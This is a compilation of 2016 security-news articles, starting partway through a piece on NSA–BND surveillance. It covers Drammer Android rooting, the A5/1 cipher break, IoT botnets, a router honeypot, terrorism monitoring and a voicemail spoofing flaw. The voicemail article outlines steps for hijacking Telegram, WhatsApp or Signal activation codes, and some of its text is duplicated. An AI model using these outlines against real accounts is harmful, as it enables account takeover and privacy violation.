The NSA tool collects ‘nearly everything a user does on the internet’, XKeyscore gives ‘widest-reaching’ collection of online data analyzing the content of emails, social media, and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and it also enables the intelligence analysts to track the user’s activities on Facebook through a system dubbed XKeyscore.

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.
The BfV didn’t provide the details of the agreement to Germany’s data protection commissioner, nor it informed the Parliamentary Control Panel.

In January, the BND has resumed its internet surveillance with the support of the NSA, the activities were suspended following the revelation on the mutual espionage activities. In July 2015 Wikileaks revealed an extended economic espionage activity conducted by the NSA in Germany, the spies were particularly interested in the Greek debt crisis.

Back to the new German surveillance law, it bans the Intelligence from spying on EU countries and its citizens, as well as EU institutions, except in the case of investigation of terrorist activity.

“It also requires the BND to submit requests for cooperation with other spy agencies with a parliamentary committee and bans the agency from carrying out industrial espionage.” states the Reuters.

“It requires the head of the BND, the chancellor’s office and an independent panel of judges to approve strategic foreign espionage activities.”

Discovery of Weapons Cache Reignites Fears ISIS Will Use Chemical Weapons in Battle for Mosul
25.10.2016 securityaffairs Cyber

The battle in Mosul of the international coalition against the ISIS is expected to become the largest battle fought in Iraq since the US-led operation in 2003.
According to the Iraqi army, approximately 50 villages have been taken from the ISIS since last Monday, as the army prepares for the onslaught on Mosul, where 5,000 to 6,000 ISIS fighters are believed to remain.
The international coalition battling to eradicate ISIS in Mosul is a disparate assembly, lacking true cohesion as each has its own reasons for fighting in this offensive.

“It’s a very, very dangerous cocktail,” Marina Ottaway, a Middle East expert at the Woodrow Wilson International Center for Scholars, said. “This is a group with completely different end-goals. There is a real fear that when they get rid of ISIS from Mosul then things are really going to blow up.”

The Key Players and Their Motivations:

Iraqi Security Forces – Leading the mission to recapture Mosul are Iraq’s security forces. In charge of a coalition of some 65,000 troops, the Iraqis have returned to the scene of their defeat reenergized and trained and equipped by the US. In recent months, they’ve amassed a few victories in liberating other ISIS-held areas.
Kurdish Peshmerga – While Iraqi security forces have been attacking from the south, Kurdish forces from Iraqi Kurdistan have advanced from the east and north. The Kurdish forces, known as Peshmerga, are in some instances fighting alongside Iraqi forces. A marriage of convenience, it is a potentially uneasy alliance. Both have an immediate needed to defeat ISIS — as well as a U.S.-brokered oil deal signed in August. And, while the Iraqi government wants to eliminate ISIS’ presence in Iraq, the Kurds have an additional motive–that of becoming an independent, internationally recognized state.
Iraqi Militias – The majority of the Iraqi militias are Shiite Muslims backed by Iran. They aren’t officially part of the Iraqi security forces, but do fight in concert with them. According to NBC News, “while not officially part of the Iraqi security forces, the Popular Mobilization Units, or PMU, was formally recognized by the Baghdad government earlier this year as an ‘independent military formation.’ The PMU’s involvement in the ISIS fight has drawn significant criticism. An Amnesty International report this week accused the militias of ‘war crimes’ and ‘gross human rights violations,’ alleging its fighters were guilty of torturing, forcibly disappearing and executing Sunni Muslims they suspected of being ISIS sympathizers.”
Turkey – While Turkey’s involvement in the Mosul operation is still somewhat ambiguous, Turkey has set up a base in Kurdish-controlled territory inside Iraq. This is an action which has angered the Baghdad government, because it has not sanctioned Turkey’s presence. Turkey has, however, been training local Sunni tribesmen to join the assault on Mosul and local Christian and Yezidi fighters have also joined the offensive.
International Forces – On the ground the U.S. has more than 4,800 troops stationed in Iraq and reportedly “a good sizable portion” are at Qayyarah Airfield, a base 40 miles south of Mosul. Then too, some 200 U.S. personnel are embedded with Iraqi and Kurdish forces closer to the front. These are mostly special forces with advisory roles and Joint Terminal Attack Controllers who call in airstrikes. The US is joined by other nations in carrying out NATO’s “train, advise and assist” mandate. This includes forces from Australia, New Zealand, France, Sweden, Italy, Denmark and others.
In the midst of gearing up for battle, a chemical weapons cache was uncovered. Photographs taken in mid-October of the weapons, in addition to chemical readings from the stockpiled weapons, were obtained by the ground team of Ed Alexander of BLACKOPS Cyber, an intelligence agency which specializes in counterterrorism, advanced cyber capabilities and Darknet operations.

Iraqi troops had captured the cache of chemical weapons, which were previously held by ISIS in Qayarah, Iraq, a city east of ISIS territory in Mosul. This location is not far from where ISIS fired artillery shells filled with mustard gas at U.S. troops last month. One of three tests on the weapons showed a positive reading of a mustard agent, according to Military.Com.

The discovery of the weapons cache validates growing concerns that ISIS is planning to use chemical weapons against U.S. and Iraqi forces during the Mosul battle.

Iraqi forces requested that coalition forces assist with the recovery and containment of the weapons, including the 36 rockets found at the site, Alexander said.

According to an article by Joshua Phillip, at Epoch Times:

“According to Drew Berquist, a former intelligence contractor who recently returned from deployment in Iraq, ISIS has two factories for making homemade rockets—one in Raqqa, Syria, and another in Mosul—and said ‘that’s what these look like.’

He said the picture of the rockets are telling, ‘because they do that all over the region,’ and that it’s likely ISIS has stepped up its production for the coming fight for Mosul because ‘they view this as an apocalyptic battle.’”

Berquist also cautioned that the rockets can be fitted with different types of weapons, including chemical and explosive weapons. He said that ISIS has definitely used chemical weapons. “They’ve got them, and they’ll try to use them in the days and weeks ahead in Mosul.”

Moreover, Dr. Robert J. Bunker, adjunct faculty at Claremont Graduate University, who has studied chemical warfare, indicated that the images do show positive readings of chemical weapons.

ISIS has already massacred 284 villagers, including children, who were being used as human shields. The terrorist group has also taken 550 families hostage for continued use as human shields in Mosul, according to the UN. But, they too are at risk of being killed.

Local families have been waving the white flag as ISIS rounds up villagers in an attempt to hold off the approaching coalition forces in the battle for Mosul. Unfortunately, the waving of the white flags has been in vain.

Hacking GSM A5 crypto algorithm by using commodity hardware
25.10.2016 securityaffairs Mobil

Researchers demonstrated how to crack GSM A5/1 Stream Cipher using a general-purpose graphics processing unit computer with 3 NVIDIA GeForce GTX690 cards.
A group of security researchers from the Agency for Science, Technology and Research (A*STAR), demonstrated that the crypto scheme used in the GSM mobile phone data can be easily hacked within seconds. Actually, it was already known that the A5/1 is vulnerable, at least since 2009.

Weaknesses in crypto algorithms (A3 algorithm for authentication, A5 algorithm for encryption, A8 algorithm for key generation) that were not submitted to peer review due to non-disclosure are the main security issued for 2G implementations.

GSM only authenticates the user to the network and not vice versa. The security model, therefore, offers confidentiality and authentication, but limited authorization capabilities, and has no non-repudiation features. GSM uses several cryptographic algorithms for security. The A5/1 and A5/2 stream ciphers are used for ensuring over-the-air voice privacy. Both algorithms have been exploited:

A5/2 is exploitable with a real-time a ciphertext-only attack
A5/1 with a rainbow table attack.
Main security concerns regarding with GSM are :
Communications and signaling traffic in the fixed network are not protected.
Does not address active attacks, whereby some network elements (e.g. BTS: Base Station)
Only as secure as the fixed networks to which they connect
Lawful interception only considered as an after-thought
Terminal identity cannot be trusted
From a purely technological perspective 3G networks use the KASUMI block crypto instead of the older A5/1 stream cipher, but also KASUMI cipher is affected by several serious weaknesses.

Now the researchers from the A*STAR, Singapore, have demonstrated how to break the A5/1 stream cipher implemented by 2G by using commodity hardware.

“GSM uses an encryption scheme called the A5/1 stream cipher to protect data,” explained Jiqiang Lu from the A*STAR Institute for Infocomm Research. “A5/1 uses a 64-bit secret key and a complex key-stream generator to make it resistant to elementary attacks such as exhaustive key searches and dictionary attacks.”

The researchers have exploited two security weaknesses to compute a look-up table using commodity hardware in 55 days. Once calculated the rainbow table, that has a side of 984GB, they are able to determine the secret key used to encrypt communications in just nine seconds.


The new method improves the classic brute force attack drastically reducing the time required for computation.

“We used a rainbow table, which is constructed iteratively offline as a set of chains relating the secret key to the cipher output,” added Lu.

“When an output is received during an attack, the attacker identifies the relevant chain in the rainbow table and regenerates it, which gives a result that is very likely to be the secret key of the cipher.”

The experts used an equipment composed of a general-purpose graphics processing unit computer with three NVIDIA GeForce GTX 690 cards, for a total cost of about $15,000.

“On a general-purpose graphics processing unit (GPGPU) computer with 3 NVIDIA GeForce GTX690 cards that cost about 15,000 United States dollars in total, we made a unified rainbow table of 984 GB in about 55 days, and implemented a unified rainbow table attack that had an online attack time of 9 s with a success probability of 34 % (or 56 %) when using 4 (respectively, 8) known keystreams (of 114 bits long each).” reads the white paper entitled Time–Memory Trade-Off Attack on the GSM A5/1 Stream Cipher Using Commodity GPGPU in the journal Applied Cryptography and Network Security. “If two such tables of 984 GB were generated, the attack would have an online attack time of 9 s with a success probability of 81 % when using 8 known keystreams. The practical results show again that nowadays A5/1 is rather insecure in reality and GSM should no longer use it.”

Millions of Android smartphones exposed to new Drammer Android attack
25.10.2016 securityaffairs Android

A new method of attack dubbed DRAMMER could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.
Earlier last year, security researchers from Google’s Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.

Now, the same previously found designing weakness has been exploited to gain unfettered “root” access to millions of Android smartphones, allowing potentially anyone to take control of the affected devices.

Experts from the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that could be exploited to gain “root” access to millions of Android smartphones targeting the device’s dynamic random access memory (DRAM). using an attack called

The attack called Rowhammer, is not new, but this is the first time it was successfully used against target mobile devices.

On March 2015, security researchers at Google’s Project Zero team demonstrated how to hijack the Intel-compatible PCs running Linux by exploiting the physical weaknesses in certain varieties of DDR DRAM (double data rate dynamic random-access memory) chips.

By exploiting the rowhammer technique the hackers can obtain higher kernel privileges on the target system. Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically an attacker can change any value of the bit in the memory.

The Rowhammer attack for mobile device involves a malicious application that once in execution repeatedly accesses the same “row” of transistors on a memory chip in a tiny fraction of a second (Hammering process)

Hammering a specific portion of memory can electrically interfere with neighboring row. This interference can cause the row to leak electricity into the next row, which eventually causes a bit to flip and consequent data modification.

An attacker can exploit these modifications to execute its code and gain control of the device.

In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause “bit flipping” in an adjacent row that could allow anyone to change the value of contents stored in the memory.

The researchers created a proof-of-concept exploit, dubbed DRAMMER, to test mobile the Rowhammer attack on mobile devices.

Details on the DRAMMER attack are included in a paper published by the experts and on this page.

To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER. The hack could modify crucial bits of data allowing attacker to root Android devices from major vendors, including Samsung, OnePlus, LG, and Motorola.

The experts exploited the Android mechanism known as the ION memory allocator to give an app a direct access to the dynamic random access memory (DRAM). The ION memory allocator also allows the attackers to identify adjacent rows on the DRAM, which is essential to power the Rowhammer attack by generating bit flips.

The ability allowed the researchers to achieve root access on the victim’s device, giving them full control of the mobile device.

“On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict,” states the paper.
“We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control.”

“Drammer is a new attack that exploits the Rowhammer hardware vulnerability on Android devices. It allows attackers to take control over your mobile device by hiding it in a malicious app that requires no permissions. Practically all devices are possibly vulnerable and must wait for a fix from Google in order to be patched. Drammer has the potential to put millions of users at risk, especially when combined with existing attack vectors like Stagefright or BAndroid.” states a blog post published by the researchers.

The experts successfully rooted Android handsets including Google’s Nexus 4 and Nexus 5; LG’s G4; Samsung Galaxy S4 and Galaxy S5, Motorola’s Moto G models from 2013 and 2014; and OnePlus One.


“Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is…(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions,” reads a paper published by the experts.

The DRAMMER app is able to take over the victim’s mobile within minutes and doesn’t request user’s interaction.

The researchers published two following proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.

In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5, while in the second one the researchers show how the DRAMMER attack can be combined with Stagefright bug that is still unpatched in many older Android devices.

The researchers have released on GitHub the source code of the DRAMMER app in order to allow users to test their mobile device and anonymously share their results.

The experts reported the issue to Google in July, and the tech giant recognized it as a “critical” vulnerability and awarded the researchers $4,000 under its bug bounty program.

The issue is expected to be partially solved with the upcoming November security bulletin, in this way it will be more difficult for attacker to launch a DRAMMER attack.

The problem is that some software features that DRAMMER exploits are so essential to any OS, it is not possible to remove or modify them without a significant impact on the overall design of the device.

Kaspersky Lab launched the new Lab ICS-CERT
25.10.2016 securityaffairs Security

Kaspersky Lab has launched a new global computer emergency response team (CERT), the Kaspersky Lab ICS-CERT, focusing on industrial control systems (ICS)..
Kaspersky has anticipated launching an Industrial Control Systems CERT. Of course, I’m joking, anyway I always sustained that the creation of a similar structure represents an important achievement for the cyber security of any government.

Kaspersky has presented the Kaspersky Lab ICS-CERT, an infrastructure that aims to share the knowledge of cyber threats and in securing industrial systems. The Kaspersky Lab ICS-CERT will coordinate the exchange of information between stakeholders, making more efficient the adoption of countermeasures and the rapid response in case of security incidents.

“Industrial Systems Emergency Response Team is a special Kaspersky Lab project that will offer the wide range of information services, starting from the intelligence on the latest threats and security incidents with mitigation strategies and all the way up to incident response and investigation consultancy and services. In addition to the latest intelligence about threats and vulnerabilities, Kaspersky Lab’s Industrial CERT will share expertise on compliance. Being a non-commercial project, ICS CERT will share information and expertise to its members free of charge.” wrote Kaspersky on the Kaspersky Lab ICS-CERT page.

Like any other CERT, also the Kaspersky Lab ICS-CERT will share information of the current threat landscape reporting and share information on the latest threats, vulnerabilities, security incidents, mitigation strategies, compliance, and investigations.

Kaspersky Lab ICS-CERT

It is important to highlight that the initiative launched by Kaspersky is a non-commercial project, the experts of the company will share information for free.

Of course, it is essential for the success of the initiative that ICS product vendors, government agencies, critical infrastructure operators, and other actors will provide their precious contribute.

Everyone benefits of the contribution made to this type of initiative, it will be particularly important for any organizations using ICS-SCADA systems that will find all the information aggregated in a single portal, on their hands they could share any experience related to cyber threats increasing the level of awareness of the overall community.

“Today’s approach to cyber security highlights the importance of accumulating intelligence on the latest threats, in order to develop protection technologies. This is especially true for industrial infrastructure, which has specific threats, highly customized hardware and software, and strict requirements for reliability,” explained Andrey Doukhvalov, head of future technologies and chief security architect at Kaspersky.

“As a security vendor, we have years of experience analyzing threats and helping industrial operators with threat prevention and detection, incident response, staff training, and the prediction of future attack vectors. We are confident that sharing intelligence, or, in a broader way, exchanging knowledge between vendors and operators, is an important step towards more secure critical infrastructure,” “By establishing ICS-CERT we are expanding the availability of the industry’s expertise in a way that no other private security vendor has done before.”

New Drammer Android Hack lets Apps take Full control (root) of your Phone
24.10.2016 thehackernews Android
Earlier last year, security researchers from Google's Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered "root" access to millions of Android smartphones, allowing potentially anyone to take control of affected devices.
Researchers in the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that targets a device's dynamic random access memory (DRAM) using an attack called Rowhammer.
Although we are already aware of the Rowhammer attack, this is the very first time when researchers have successfully used this attack to target mobile devices.
What is DRAM Rowhammer Attack?
The Rowhammer attack against mobile devices is equally dangerous because it potentially puts all critical data on millions of Android phones at risk, at least until a security patch is available.
The Rowhammer attack involves executing a malicious application that repeatedly accesses the same "row" of transistors on a memory chip in a tiny fraction of a second in a process called "Hammering."
As a result, hammering a memory region can disturb neighboring row, causing the row to leak electricity into the next row which eventually causes a bit to flip. And since bits encode data, this small change modifies that data, creating a way to gain control over the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row that could allow anyone to change the value of contents stored in the memory.
Is Your Android Phone Vulnerable?
To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER, and found their exploit successfully altered crucial bits of data in a way that completely roots big brand Android devices from Samsung, OnePlus, LG, Motorola, and possibly other manufacturers.
The researchers successfully rooted Android handsets including Google's Nexus 4 and Nexus 5; LG's G4; Samsung Galaxy S4 and Galaxy S5, Motorola's Moto G models from 2013 and 2014; and OnePlus One.
"Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is...(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions," the researchers wrote in their paper [PDF] titled, "Drammer: Deterministic Rowhammer Attacks on Mobile Platforms."
How does the DRAMMER Attack Work? (Exploit Source Code)

The researchers created an app — containing their rooting exploit — that requires no special user permissions in order to avoid raising suspicion. The DRAMMER attack would then need a victim to download the app laced with malware (researchers' exploit code) to execute the hack.
The researchers took advantage of an Android mechanism called the ION memory allocator to gain direct access to the dynamic random access memory (DRAM).
Besides giving every app direct access to the DRAM, the ION memory allocator also allows identifying adjacent rows on the DRAM, which is an important factor for generating targeted bit flips.
Knowing this, the researchers then had to figure out how to use the bit flipping to achieve root access on the victim's device, giving them full control of the target phone and the ability to do anything from accessing data to taking photos.
"On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict," the paper reads.
"We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control."
Once you download this malicious app, the DRAMMER exploit takes over your phone within minutes – or even seconds – and runs without your interaction. The attack continues to run even if you interact with the app or put your phone in "sleep" mode.
The researchers expect to soon publish an app [source code available here] that will let you test your Android smartphone yourself and anonymously include your results in a running tally, which will help researchers track the list of vulnerable devices.
DRAMMER Has No Quick Fix
The group of researchers privately disclosed its findings to Google in July, and the company designated the flaw as "critical," awarding the researchers $4,000 under its bug bounty program.
Google says the company has informed its manufacturing partners of the issue earlier this month and has developed a mitigation which it will include in its upcoming November security bulletin to make the DRAMMER attack much harder to execute.
However, the researchers warned that one could not replace the memory chip in Android smartphones that have already been shipped.
And even some software features that DRAMMER exploits are so fundamental and essential to any OS that they are difficult to remove or modify without impacting the user experience.
In short, the attack is not easy to patch in the next generation of Android phones.
Video Demonstration of DRUMMER Attack on Android 6.0.1

The researchers have also published two proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5.
In the second video, the researchers show how the DRAMMER attack can be combined with Stagefright bug that remains unpatched in many older Android handsets.

The Stagefright exploit gives the researchers an advanced shell, and by running the DRAMMER exploit, the shell gains root access.
The researcher's exploit can target the majority of the world's Android phones.
"Our research shows that practical large-scale Rowhammer attacks are a serious threat and while the response to the Rowhammer has been relatively slow from vendors, we hope our work will accelerate mitigation efforts both in industry and academia," the researchers concluded.
The group research focuses on Android rather than iOS because the researchers are intimately familiar with the Google's mobile OS which is based on Linux. But the group says it would theoretically be possible to replicate the same attack in an iPhone with additional research.
For more detailed information, you can head on to this informational page about DRAMMER and this paper published early this morning.

24 hours in the life of my home router by Francisco J. Rodriguez
24.10.2016 securityaffairs Attack

Recently a massive DDoS attack has disconnected a large portion of users from the Internet, hackers exploited IoT devices. Is your router secure?
“Are we ready to live in a world where all devices are exposed to cyber attacks?”

That is how I opened my presentation in QurtubaCON16 – cyber security event at Córdoba City (Spain) – and how I will open the next event: HoneyCON16 (Guadalajara, Spain) at November 11th. My intention is that every person takes their own conclusions about the risks that everybody assumes every time we connect our devices to the internet.

Have you ever wondered happens in your home router and that threats lurk in the moment you press the power button?

In this article, I intend to analyze the attacks and the cybersecurity events I have received in my personal router in Spanish ISP. This information may lead you to become aware of the high risk of having these devices connected to the web, even when we expose our lives on social media.

I have exposed my personal router to possible attacks because home routers haven’t been receiving the appropriate attention and, in some cases, people use to let them on during the entire year. People use to let these devices completely exposed and they don’t realize that sometimes administrator control panel is vulnerable and they are vulnerable to certain attacks or have different security flaws that have not been patched or by our Internet provider or by the device manufacturer.

We recommend you to visiting http://routersecurity.org/ to find more information about bugs and detected vulnerabilities in the last years to home routers and some recommendations.


In recent years, there has been news about vulnerabilities in routers distributed in Spain that show the seriousness of the matter:

http://www.hackplayers.com/2015/02/250k-routers-de-telefonica-mismas-clav es-ssh.html
http://www.muycomputer.com/2015/03/20/700-000-routers-adsl-isp-vulnerable s
http://www.redeszone.net/2015/01/06/los-routers-de-movistar-adb-pirelli-p-dg a4001n-tienen-un-grave-fallo-de-seguridad/
http://www.pcworld.es/seguridad/un-estudio-espanol-descubre-60-vulnerabilid ades-en-22-modelos-de-routers
What if an attacker gains access to the DNS settings of your router and modifies it?

It is not just about losing our privacy (because a cybercriminal could monitor your internet navigation); it is about letting an attacker to theft your identity, for example, in your personal bank or company website to obtain your credentials. This is just an example of what could really happen.


In many cases, the received attacks are automatic, so, if your router is in the cybercriminal range you could be a potential victim. The typical excuse “I am nobody” is not valid. You only need to be on the range – it doesn’t need to be an personal attack. The greater the number of potential victims greater the percentage of success.

To recollect all this events and cyberattacks, I usually use a sensor to redirect all the traffic that goes to my public IP that corresponds to my own router. I monitor all incoming activity in TCP and UDP range. I also monitor ICMP packets. I consider as suspicious every traffic addressed to my IP and I follow any attempt of connection to my TCP port.

Keep in mind that an IP address of a possible attacker by itself is not a relevant fact, since you can use different techniques to hide the real IP source or even the attacker can use a device already breached for his attack through him. At no time did I spread my IP address to receive attacks.

Data collection occurred between Wednesday, October 6 at 6PM and Thursday, October 24 at 6PM.

Once data collection time have finished, I present you the results:


In 24 hours they produced a total of 20,070 events to my home router, which I consider as 4678 attacks. There has been a total of 92 different countries from which connections have received a total of 349 different ports.

More than half of the events were received from Asia. Among the ports that have received more connections, we highlight the SSH, Telnet, 443, 2323, RDP, VNC, 8080 among other services. If I ever have published that my services were exposed, we could ask ourselves what they are looking for and how they found me. We can know it if we perform an analysis of everything that has occurred.


Among the origins of events, it is normal lately find Vietnam on top. The answer to this can be found in details in the following article: http://securityaffairs.co/wordpress/52015/hacking/mirai-botnet.html

It happens due to a large number of infected IOT devices with MIRAI that have among their targets Spanish IP.



The graph above shows the traffic received from attacks (not all the events) during these 24 hours of analysis (Origin country, ASN, IP and port):


Some highlights countries by the number of attacks carried out (A, IP, and Port):




Most of the attacks have received European and Asian origin. We have also received a small share of attacks from Spain.




Analyzing some of the IPs that have attacked my router I could find the following web administration panels corresponding to cameras and routers:





Some of them do not need credentials for access and others have default credentials. They have visited my router (or perhaps any team behind that network), are connected to my decoy ports have downloaded malware samples have tried to include me in their botnet, they have used my gateway for attacks, including other activities.

There have been downloaded several samples of malware, including Mirai:


But it has not been the only malware that has tried to download. You can see below the demonstration of the large number of downloads using Wget that have attempted:

Once all the data were observed, you should ask yourself if your home router could be attacked or not. Don’t ask if it was attacked or not: ask when it will be. Thinking about the information presented in this article, maybe you are a little more aware that it will happen to you soon or later. I hope this time you have not your router exposed, have your credentials too weak and have exposed more information than necessary. Maybe you’ve already been attacked and still don’t know.

If you do not have these tips in mind, perhaps your IP address would appear on the next list.

Best regards.

These one and more articles are available at www.fwhibbit.es

My talk about honeypots:

Twitter: @0fjrm0

Hackers offered an loT botnet for $7,500. The recent attack may be just a test
24.10.2016 securityaffairs BotNet

The security firm RSA revealed to have discovered in early October, hackers advertising access to a huge IoT botnet on an underground criminal forum.
Last week, a massive DDoS attack against the Dyn DNS service, one of the most authoritative domain name system (DNS), caused an extended Internet outage. A large portion of internet users was not able to reach most important web services, many websites including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify were down for netizens in the US.

The Dyn DNS Service was flooded by a devastating wave of requests originated by million of compromised IoT devices. The Dyn company reported a huge army of hijacked Internet of Things devices has been abused by attackers to power the massive DDoS attack.

The security intelligence firm Flashpoint published an interesting post on the massive DDoS in which confirm that its experts have observed the Mirai bots driving the attack against DynDNS.

“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “

Below the Key Findings of the report published by Flashpoint

Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
Unfortunately, the situation could be worse because hackers are selling access to a huge botnet composed of compromised Internet of Things (IoT) devices.

The security firm RSA revealed to have discovered in early October, hackers advertising access to a huge IoT botnet on an underground criminal forum.

“This is the first time we’ve seen an IoT botnet up for rent or sale, especially one boasting that amount of firepower. It’s definitely a worrying trend seeing the DDoS capabilities grow,” Daniel Cohen, head of the RSA’s FraudAction business unit, told Forbes.

According to RSA the hackers advertised an IoT botnet that is able to power DDoS attack with a 1 Tbps of traffic, the same volume of traffic that flooded the French hosting provider OVH. It is not clear if the botnet was composed of devices infected by the Mirai malware.

The hackers were offering a botnet composed of 50,000 devices for $4,600, meanwhile 100,000 bots the price is $7,500.


Cohen clarified that RSA has no evidence that the botnet is linked to infrastructure that hit the Dyn DNS service on Friday.

“Hackers have long sold access to botnets, though haven’t explicitly advertised their use of IoT devices like connected cameras, fridges and kettles. The infamous LizardSquad amassed sizeable botnets for its LizardStresser “booter” – a DDoS weapon for hire – but it largely compromised vulnerable routers.” reported FORBES.

IoT vendors are warned of future risks of cyber attacks, the Chinese manufacturer of surveillance and home video devices targeted by the Mirai botnet, Xiongmai Technology (XM), has pushed out parched to avoid the hacking of its devices.

However, any device running firmware released before September 2015 that is still using the default username and password (well known in the hacker community) remains vulnerable to attacks that use the credentials to access the devices via Telnet.

Attacks like the one powered by the IoT botnet on Friday are difficult to mitigate, anyway, the adoption of a secondary, back-up DNS provider could make hard for the attacker to shut down the web service.

Other countermeasures are listed in the FORBES blog post.

InTheCyber discovered a serious flaw in messaging systems
24.10.2016 securityaffairs Mobil

Researchers at InTheCyber firm have discovered a new easy exploitable and dangerous vulnerability affecting messaging systems.
InTheCyber – Intelligence & Defense Advisors (www.inthecyber.com), a leader in offensive & Defensive Cyber Security, has discovered in its R&D Labs a new easy and dangerous vulnerability affecting messaging systems.

Voicemail caller-id spoofing it’s a quite old flaw. When the mobile operator relies on caller-id to authenticate the user inside his voicemail, an attacker could falsify his caller-id in order to impersonate the user and gain access to his voicemail. At the moment, two of the biggest Italy mobile operators allow this kind of attack.

This undoubtedly raises problems about the privacy of the communications, especially the information stored inside the voicemail. Moreover, this old flaw could be weaponized in order to compromise other services.

For example, Telegram, WhatsApp, and Signal, when an activation code is requested, as start forward an SMS with the activation code. If the code is not entered promptly, these services resend the activation code through an automated call.

Depending on the configuration of the voicemail of the user, the authentication code will be inside his voicemail in the following scenarios: user does not respond, the user is not reachable, the user is occupied. In the first scenario, an attacker could try to ask an activation code using the victim account during the night-time. In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.

In the first scenario, an attacker could try to ask an activation code using the victim account during the night-time. In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.

In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.

messaging systems flaw

Besides caller-id spoofing often voicemail services rely on default or a guessable pin to authenticate a user, for example, when he tries to access his voicemail from another phone number.

Basically, if the voicemail is somehow accessible by an unauthorized person, and if no two-actor authentication is enabled, every service that relies on an automated call to send an activation code is hijackable.

Below a video PoC of the hack

Terrorism activity continues unabated – Tower of Babel under the surface
24.10.2016 securityaffairs Crime

This increase of the activity led Intel experts at Global Intelligence Insight to raise the level of terrorism threat in Italy to #1.
With the eyes of the world set on the American Presidential elections on one side, and on Aleppo, Mosul and most recently Kirkuk on the other, underneath the online surface of the internet, multilingual jihadist channels and chat rooms spread like wildfire on protected, private and invite-only platforms, such as Telegram or ChatSecure.

Besides the usual terrosism and pro-violence propaganda and gore videos of executions portraying jihadists as rock stars proudly holding AK’s and explosive vests (some of them children aged no more than 7-9), it’s noticeable the growing urgency of these radicals to widen the reach of their message to more countries – always contemplating the goal of converting lone wolves (often described as “turbo conversions”, considering how rapidly it’s been happening), and the planning of operations, including how to get the logistics set up. Hence the relevance of language.

The geography of attack planning is strictly connected with the increasing activity and use of a certain language in both channels and chat groups.

Portuguese from Portugal, Italian, Urdu and Bengali are the most recent focuses (English and French are always a given).

Through our 24/7 monitoring and active infiltration in these hundreds of chatrooms, we can establish several types of correlations between the users, and extrapolate conclusions with quantifiable data. Some of the most recent ones are quite surprising even to our most experienced analysts.

Lately, we have identified a rapid and aggressive adherence to Italian channels. As an example, a recently created Italian channel had an increase of 430 active members in just 36 hours, and this uncommon pattern made several alarms ring all over our offices.

We are talking about gatekeepers, operatives displaying tactical experience and a general population of sympathizers to the Salafi jihadist cause, communicating and sharing propaganda and battlefront news in fluent Italian.

terrorism jihadist-activity

This increase of terrorism linked activity led us to raise the level of threat in Italy to Tier #1, and look out for any kind of undergoing operation.

There are also many other types of transversal trends that we analyze and correlate, to validate a certain conclusion, such as the most recent and growing concern on communicating in the most secure and anonymous way possible. The release of detailed and complex manuals by the so-called “Islamic OPSEC IT Team”, with contents clearly developed by IT professionals, is a clear illustration of this fact.

And with the self-proclaimed Islamic State being gradually strangled in both Syria and Iraq, suffering heavy casualties North and South, many seasoned veterans are already trying to make their way to Europe. The idea of having a command center physically set and issuing instructions – a notion to which several intelligence companies still tend to linger – is completely obsolete.

This war’s most urgent frontline, is still – and will continue to be – online.

NOTE: This brief article is a part of a full intelligence assessment developed by Global Intelligence Insight.

